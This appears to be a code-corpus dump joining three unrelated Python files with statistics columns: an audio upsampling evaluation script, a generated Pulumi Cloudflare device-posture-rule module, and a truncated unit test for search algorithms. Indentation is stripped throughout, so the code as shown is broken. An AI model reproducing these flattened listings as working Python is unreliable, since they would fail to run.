# inp_filted_lr = inp_filted_lr.sub(1)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "PRED.flac"), pred_data, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "HIGH.flac"), inp_filted_hr, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "LOW.flac"), inp_filted_lr, 12000 // scale)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "SLINE.flac"), pred_data_spline, 12000)
fig = plt.figure(figsize=(30, 5))
subplot = fig.add_subplot(scale, 5, 1)
plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp)
subplot = fig.add_subplot(1, 5, 2)
plt.specgram(pred_data, Fs=12000, cmap=newcmp, NFFT=256 * scale)
subplot = fig.add_subplot(1, 5, 3)
plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, NFFT=256 * scale)
subplot = fig.add_subplot(1, 5, 4)
plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, NFFT=256 * scale)
subplot = fig.add_subplot(1, 5, 5)
plt.colorbar(label="ok", orientation="vertical")
plt.show()
# LSD_list.append(LSD(pred_data, inp_filted_hr))
# SNR_list.append(SNR(pred_data, inp_filted_hr))
LSD_list.append(LSD(pred_data, inp_filted_hr))
SNR_list.append(SNR(pred_data, inp_filted_hr))
print("Discrepancy with testing results")
print("ModelLSD: ", LSD(pred_data, inp_filted_hr))
print("SplineLSD: ", LSD(pred_data_spline, inp_filted_hr))
print("ModelSNR: ", SNR(pred_data, inp_filted_hr))
print("SplineSNR: ", SNR(pred_data_spline, inp_filted_hr))
plt.close()
# print(max(pred_data), "<->", min(pred_data))
# print(max(inp_filted_hr), "<->", min(inp_filted_hr))
# print(max(inp_filted_lr), "<->", min(inp_filted_lr))
# print(max(pred_data_spline), "<->", min(pred_data_spline))
print("meanLSD: ", np.mean(LSD_list))
print("varLSD: ", np.var(LSD_list))
print("meanSNR: ", np.mean(SNR_list))
print("varSNR: ", np.var(SNR_list))
if Linear:
SLSD_list = []
FLSD_list = []
LLSD_list = []
SSNR_list = []
FSNR_list = []
LSNR_list = []
# file = '.\\Data\\Test\\p228_045_mic1.flac'
# wave_dir = "." + os.path.sep + "Data" + os.path.sep + "TEST"
if single:
inp = sf.read(file)[0]
inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
inp_filted_hr = inp_filted[::4]
inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
print(len(inp))
print(len(inp_filted))
inp_filted_lr = torch.from_numpy(
butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
pred_data_linear = linear_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
pred_data_linear = pred_data_linear.sub(1).cpu().detach().numpy()[0]
pred_data_flat = flat_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
pred_data_flat = pred_data_flat.sub(1).cpu().detach().numpy()[0]
print(pred_data_spline.shape)
print(inp_filted_hr.shape)
fig = plt.figure(figsize=(30, 5))
subplot = fig.add_subplot(scale, 5, 1)
plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp, noverlap=int((12000 // scale) * 0.025),
NFFT=int(12000 // scale * 0.05))
subplot = fig.add_subplot(1, 5, 2)
plt.specgram(pred_data_flat, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
subplot = fig.add_subplot(1, 5, 3)
plt.specgram(pred_data_linear, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
subplot = fig.add_subplot(1, 5, 4)
plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
subplot = fig.add_subplot(1, 5, 5)
plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
plt.show()
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "Flat.flac"), pred_data_flat, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "Line.flac"), pred_data_linear, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "SLINE.flac"), pred_data_spline, 12000)
# LSD_list.append(LSD(pred_data, inp_filted_hr))
# SNR_list.append(SNR(pred_data, inp_filted_hr))
SLSD_list.append(LSD(pred_data_spline, inp_filted_hr))
SSNR_list.append(SNR(pred_data_spline, inp_filted_hr))
FLSD_list.append(LSD(pred_data_flat, inp_filted_hr))
FSNR_list.append(SNR(pred_data_flat, inp_filted_hr))
LLSD_list.append(LSD(pred_data_linear, inp_filted_hr))
LSNR_list.append(SNR(pred_data_linear, inp_filted_hr))
else:
files = [os.path.join(wave_dir, x) for x in os.listdir(wave_dir)]
data = []
for file in files:
inp = sf.read(file)[0]
inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
inp_filted_hr = inp_filted[::4]
inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
print(len(inp))
print(len(inp_filted))
inp_filted_lr = torch.from_numpy(
butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
pred_data_linear = linear_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
pred_data_linear = pred_data_linear.sub(1).cpu().detach().numpy()[0]
pred_data_flat = flat_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
pred_data_flat = pred_data_flat.sub(1).cpu().detach().numpy()[0]
print(pred_data_spline.shape)
print(inp_filted_hr.shape)
fig = plt.figure(figsize=(30, 5))
subplot = fig.add_subplot(scale, 5, 1)
plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp, noverlap=int((12000 // scale) * 0.025),
NFFT=int(12000 // scale * 0.05))
subplot = fig.add_subplot(1, 5, 2)
plt.specgram(pred_data_flat, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
subplot = fig.add_subplot(1, 5, 3)
plt.specgram(pred_data_linear, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
subplot = fig.add_subplot(1, 5, 4)
plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
subplot = fig.add_subplot(1, 5, 5)
plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
plt.show()
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "Flat.flac"), pred_data_flat, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "Line.flac"), pred_data_linear, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "SLINE.flac"), pred_data_spline, 12000)
# LSD_list.append(LSD(pred_data, inp_filted_hr))
# SNR_list.append(SNR(pred_data, inp_filted_hr))
SLSD_list.append(LSD(pred_data_spline, inp_filted_hr))
SSNR_list.append(SNR(pred_data_spline, inp_filted_hr))
FLSD_list.append(LSD(pred_data_flat, inp_filted_hr))
FSNR_list.append(SNR(pred_data_flat, inp_filted_hr))
LLSD_list.append(LSD(pred_data_linear, inp_filted_hr))
LSNR_list.append(SNR(pred_data_linear, inp_filted_hr))
# print(max(pred_data), "<->", min(pred_data))
# print(max(inp_filted_hr), "<->", min(inp_filted_hr))
# print(max(inp_filted_lr), "<->", min(inp_filted_lr))
# print(max(pred_data_spline), "<->", min(pred_data_spline))
print("meanLSDS: ", np.mean(SLSD_list))
print("varLSDS: ", np.var(SLSD_list))
print("meanSNRS: ", np.mean(SSNR_list))
print("varSNRS: ", np.var(SSNR_list))
print("meanLSDF: ", np.mean(FLSD_list))
print("varLSDF: ", np.var(FLSD_list))
print("meanSNRF: ", np.mean(FSNR_list))
print("varSNRF: ", np.var(FSNR_list))
print("meanLSDL: ", np.mean(LLSD_list))
print("varLSDL: ", np.var(LLSD_list))
print("meanSNRL: ", np.mean(LSNR_list))
print("varSNRL: ", np.var(LSNR_list))
| 51.58867
| 120
| 0.595369
| 2,845
| 20,945
| 4.147627
| 0.081898
| 0.122034
| 0.081102
| 0.042373
| 0.837712
| 0.823305
| 0.821695
| 0.815339
| 0.813136
| 0.813136
| 0
| 0.04915
| 0.250084
| 20,945
| 405
| 121
| 51.716049
| 0.702107
| 0.092671
| 0
| 0.746951
| 0
| 0
| 0.074781
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.033537
| 0.039634
| 0
| 0.039634
| 0.164634
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bbeac278917af1dcc4820889b45dbddec766da7
| 22,000
|
py
|
Python
|
sdk/python/pulumi_cloudflare/device_posture_rule.py
|
pulumi/pulumi-cloudflare
|
d444af2fab6101b388a15cf2e3933e45e9935cc6
|
[
"ECL-2.0",
"Apache-2.0"
] | 35
|
2019-03-14T21:29:29.000Z
|
2022-03-30T00:00:59.000Z
|
sdk/python/pulumi_cloudflare/device_posture_rule.py
|
pulumi/pulumi-cloudflare
|
d444af2fab6101b388a15cf2e3933e45e9935cc6
|
[
"ECL-2.0",
"Apache-2.0"
] | 128
|
2019-03-08T23:45:58.000Z
|
2022-03-31T21:05:22.000Z
|
sdk/python/pulumi_cloudflare/device_posture_rule.py
|
pulumi/pulumi-cloudflare
|
d444af2fab6101b388a15cf2e3933e45e9935cc6
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2019-05-10T12:52:56.000Z
|
2020-03-24T15:02:14.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DevicePostureRuleArgs', 'DevicePostureRule']
@pulumi.input_type
class DevicePostureRuleArgs:
def __init__(__self__, *,
account_id: pulumi.Input[str],
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
inputs: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]] = None,
matches: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
schedule: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DevicePostureRule resource.
:param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
:param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
:param pulumi.Input[str] description: The description of the device posture rule.
:param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]] inputs: The value to be checked against. See below for reference
structure.
:param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]] matches: The conditions that the client must match to run the rule. See below for reference structure.
:param pulumi.Input[str] name: Name of the device posture rule.
:param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
"""
pulumi.set(__self__, "account_id", account_id)
pulumi.set(__self__, "type", type)
if description is not None:
pulumi.set(__self__, "description", description)
if inputs is not None:
pulumi.set(__self__, "inputs", inputs)
if matches is not None:
pulumi.set(__self__, "matches", matches)
if name is not None:
pulumi.set(__self__, "name", name)
if schedule is not None:
pulumi.set(__self__, "schedule", schedule)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Input[str]:
"""
The account to which the device posture rule should be added.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: pulumi.Input[str]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the device posture rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def inputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]:
"""
The value to be checked against. See below for reference
structure.
"""
return pulumi.get(self, "inputs")
@inputs.setter
def inputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]):
pulumi.set(self, "inputs", value)
@property
@pulumi.getter
def matches(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]:
"""
The conditions that the client must match to run the rule. See below for reference structure.
"""
return pulumi.get(self, "matches")
@matches.setter
def matches(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]):
pulumi.set(self, "matches", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the device posture rule.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def schedule(self) -> Optional[pulumi.Input[str]]:
"""
Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
"""
return pulumi.get(self, "schedule")
@schedule.setter
def schedule(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schedule", value)
@pulumi.input_type
class _DevicePostureRuleState:
def __init__(__self__, *,
account_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
inputs: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]] = None,
matches: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
schedule: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DevicePostureRule resources.
:param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
:param pulumi.Input[str] description: The description of the device posture rule.
:param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]] inputs: The value to be checked against. See below for reference
structure.
:param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]] matches: The conditions that the client must match to run the rule. See below for reference structure.
:param pulumi.Input[str] name: Name of the device posture rule.
:param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
:param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
"""
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if description is not None:
pulumi.set(__self__, "description", description)
if inputs is not None:
pulumi.set(__self__, "inputs", inputs)
if matches is not None:
pulumi.set(__self__, "matches", matches)
if name is not None:
pulumi.set(__self__, "name", name)
if schedule is not None:
pulumi.set(__self__, "schedule", schedule)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[str]]:
"""
The account to which the device posture rule should be added.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the device posture rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def inputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]:
"""
The value to be checked against. See below for reference
structure.
"""
return pulumi.get(self, "inputs")
@inputs.setter
def inputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]):
pulumi.set(self, "inputs", value)
@property
@pulumi.getter
def matches(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]:
"""
The conditions that the client must match to run the rule. See below for reference structure.
"""
return pulumi.get(self, "matches")
@matches.setter
def matches(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]):
pulumi.set(self, "matches", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the device posture rule.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def schedule(self) -> Optional[pulumi.Input[str]]:
"""
Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
"""
return pulumi.get(self, "schedule")
@schedule.setter
def schedule(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schedule", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
class DevicePostureRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
inputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]]] = None,
matches: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
schedule: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Cloudflare Device Posture Rule resource. Device posture rules configure security policies for device posture checks.
## Example Usage
```python
import pulumi
import pulumi_cloudflare as cloudflare
corporate_devices_posture_rule = cloudflare.DevicePostureRule("corporateDevicesPostureRule",
account_id="1d5fdc9e88c8a8c4518b068cd94331fe",
name="Corporate devices posture rule",
type="serial_number",
description="Device posture rule for corporate devices.",
schedule="24h",
matches=[cloudflare.DevicePostureRuleMatchArgs(
platform="mac",
)],
inputs=[cloudflare.DevicePostureRuleInputArgs(
id=cloudflare_teams_list["corporate_devices"]["id"],
)])
```
## Import
Device posture rules can be imported using a composite ID formed of account ID and device posture rule ID.
```sh
$ pulumi import cloudflare:index/devicePostureRule:DevicePostureRule corporate_devices cb029e245cfdd66dc8d2e570d5dd3322/d41d8cd98f00b204e9800998ecf8427e
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
:param pulumi.Input[str] description: The description of the device posture rule.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]] inputs: The value to be checked against. See below for reference
structure.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]] matches: The conditions that the client must match to run the rule. See below for reference structure.
:param pulumi.Input[str] name: Name of the device posture rule.
:param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
:param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DevicePostureRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Cloudflare Device Posture Rule resource. Device posture rules configure security policies for device posture checks.
## Example Usage
```python
import pulumi
import pulumi_cloudflare as cloudflare
corporate_devices_posture_rule = cloudflare.DevicePostureRule("corporateDevicesPostureRule",
account_id="1d5fdc9e88c8a8c4518b068cd94331fe",
name="Corporate devices posture rule",
type="serial_number",
description="Device posture rule for corporate devices.",
schedule="24h",
matches=[cloudflare.DevicePostureRuleMatchArgs(
platform="mac",
)],
inputs=[cloudflare.DevicePostureRuleInputArgs(
id=cloudflare_teams_list["corporate_devices"]["id"],
)])
```
## Import
Device posture rules can be imported using a composite ID formed of account ID and device posture rule ID.
```sh
$ pulumi import cloudflare:index/devicePostureRule:DevicePostureRule corporate_devices cb029e245cfdd66dc8d2e570d5dd3322/d41d8cd98f00b204e9800998ecf8427e
```
:param str resource_name: The name of the resource.
:param DevicePostureRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DevicePostureRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
inputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]]] = None,
matches: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
schedule: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DevicePostureRuleArgs.__new__(DevicePostureRuleArgs)
if account_id is None and not opts.urn:
raise TypeError("Missing required property 'account_id'")
__props__.__dict__["account_id"] = account_id
__props__.__dict__["description"] = description
__props__.__dict__["inputs"] = inputs
__props__.__dict__["matches"] = matches
__props__.__dict__["name"] = name
__props__.__dict__["schedule"] = schedule
if type is None and not opts.urn:
raise TypeError("Missing required property 'type'")
__props__.__dict__["type"] = type
super(DevicePostureRule, __self__).__init__(
'cloudflare:index/devicePostureRule:DevicePostureRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
inputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]]] = None,
matches: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
schedule: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None) -> 'DevicePostureRule':
"""
Get an existing DevicePostureRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
:param pulumi.Input[str] description: The description of the device posture rule.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]] inputs: The value to be checked against. See below for reference
structure.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]] matches: The conditions that the client must match to run the rule. See below for reference structure.
:param pulumi.Input[str] name: Name of the device posture rule.
:param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
:param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DevicePostureRuleState.__new__(_DevicePostureRuleState)
__props__.__dict__["account_id"] = account_id
__props__.__dict__["description"] = description
__props__.__dict__["inputs"] = inputs
__props__.__dict__["matches"] = matches
__props__.__dict__["name"] = name
__props__.__dict__["schedule"] = schedule
__props__.__dict__["type"] = type
return DevicePostureRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Output[str]:
"""
The account to which the device posture rule should be added.
"""
return pulumi.get(self, "account_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the device posture rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def inputs(self) -> pulumi.Output[Sequence['outputs.DevicePostureRuleInput']]:
"""
The value to be checked against. See below for reference
structure.
"""
return pulumi.get(self, "inputs")
@property
@pulumi.getter
def matches(self) -> pulumi.Output[Optional[Sequence['outputs.DevicePostureRuleMatch']]]:
"""
The conditions that the client must match to run the rule. See below for reference structure.
"""
return pulumi.get(self, "matches")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the device posture rule.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def schedule(self) -> pulumi.Output[Optional[str]]:
"""
Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
"""
return pulumi.get(self, "schedule")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
"""
return pulumi.get(self, "type")
| 43.650794
| 202
| 0.641091
| 2,434
| 22,000
| 5.641331
| 0.079704
| 0.096934
| 0.068313
| 0.062486
| 0.861408
| 0.840798
| 0.824922
| 0.809118
| 0.802491
| 0.795791
| 0
| 0.008645
| 0.253364
| 22,000
| 503
| 203
| 43.737575
| 0.827286
| 0.367636
| 0
| 0.746212
| 1
| 0
| 0.106693
| 0.047888
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159091
| false
| 0.003788
| 0.026515
| 0
| 0.280303
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
32cea390f719e0fc1fb072dedd04f1cd57ca0f19
| 7,397
|
py
|
Python
|
Testing/test_Searching.py
|
Yarintop/Data-Structures-And-Algorithms-In-Python
|
55db9e7f39211c42988171d51ef2659041df1aa1
|
[
"MIT"
] | null | null | null |
Testing/test_Searching.py
|
Yarintop/Data-Structures-And-Algorithms-In-Python
|
55db9e7f39211c42988171d51ef2659041df1aa1
|
[
"MIT"
] | null | null | null |
Testing/test_Searching.py
|
Yarintop/Data-Structures-And-Algorithms-In-Python
|
55db9e7f39211c42988171d51ef2659041df1aa1
|
[
"MIT"
] | null | null | null |
import unittest
import random
from Algorithms.Searching.LinearSearch import LinearSearch
from Algorithms.Searching.BinarySearch import BinarySearch
from Algorithms.Searching.JumpSearch import JumpSearch
from Algorithms.Searching.ExponentialSearch import ExponentialSearch
from Algorithms.Searching.TernarySearch import TernarySearch
from Algorithms.Searching.JumpSearch import JumpSearch
from Algorithms.Searching.FibonacciSearch import FibonacciSearch
class TestSearching(unittest.TestCase):
def __init__(self, methodName: str = ...) -> None:
super().__init__(methodName=methodName)
self.arr = []
for i in range(20):
self.arr.append(random.randint(-100, 100))
self.arr.sort()
# For Every Test, It checks if self.arr[The index the algorithms returns] is equal to self.arr[the index we gave].
# The reason for this is in case there are duplicates, we don't want the assert to fail by checking the index.
def test_first_value(self):
self.assertEqual(self.arr[LinearSearch.linearSearch(self.arr, self.arr[0])], self.arr[0], "test_last_value - Linear Search")
self.assertEqual(self.arr[BinarySearch.binarySearch(self.arr, self.arr[0])], self.arr[0], "test_last_value - Linear Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[0])], self.arr[0], "test_last_value - Linear Search")
self.assertEqual(self.arr[ExponentialSearch.exponentialSearch(self.arr, self.arr[0])], self.arr[0], "test_last_value - Linear Search")
self.assertEqual(self.arr[TernarySearch.ternarySearch(self.arr, self.arr[0])], self.arr[0], "test_last_value - Linear Search")
self.assertEqual(self.arr[JumpSearch.jumpSearch(self.arr, self.arr[0])], self.arr[0], "test_last_value - Jump Search")
self.assertEqual(self.arr[FibonacciSearch.fibonacciSearch(self.arr, self.arr[0])], self.arr[0], "test_last_value - Fibonacci Search")
def test_last_value(self):
self.assertEqual(self.arr[LinearSearch.linearSearch(self.arr, self.arr[len(self.arr) - 1])], self.arr[len(self.arr) - 1], "test_last_value - Linear Search")
